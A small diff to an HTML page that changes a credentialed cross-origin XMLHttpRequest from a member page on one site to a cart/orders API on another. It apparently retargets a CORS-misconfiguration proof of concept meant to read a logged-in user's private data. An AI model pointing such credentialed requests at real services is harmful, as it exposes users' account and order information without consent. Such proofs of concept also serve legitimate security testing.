--- a/index.html
+++ b/index.html
@@ -13,7 +13,7 @@
                  }
              };
               xhr.open("GET",
-                       "https://wholeip.com/member/mypage.do", true);
+                       "https://www.opposhop.cn/cn/oapi/orders/web/cart/v1/list?opca=", true);
              xhr.withCredentials = true;
              xhr.send();
              }
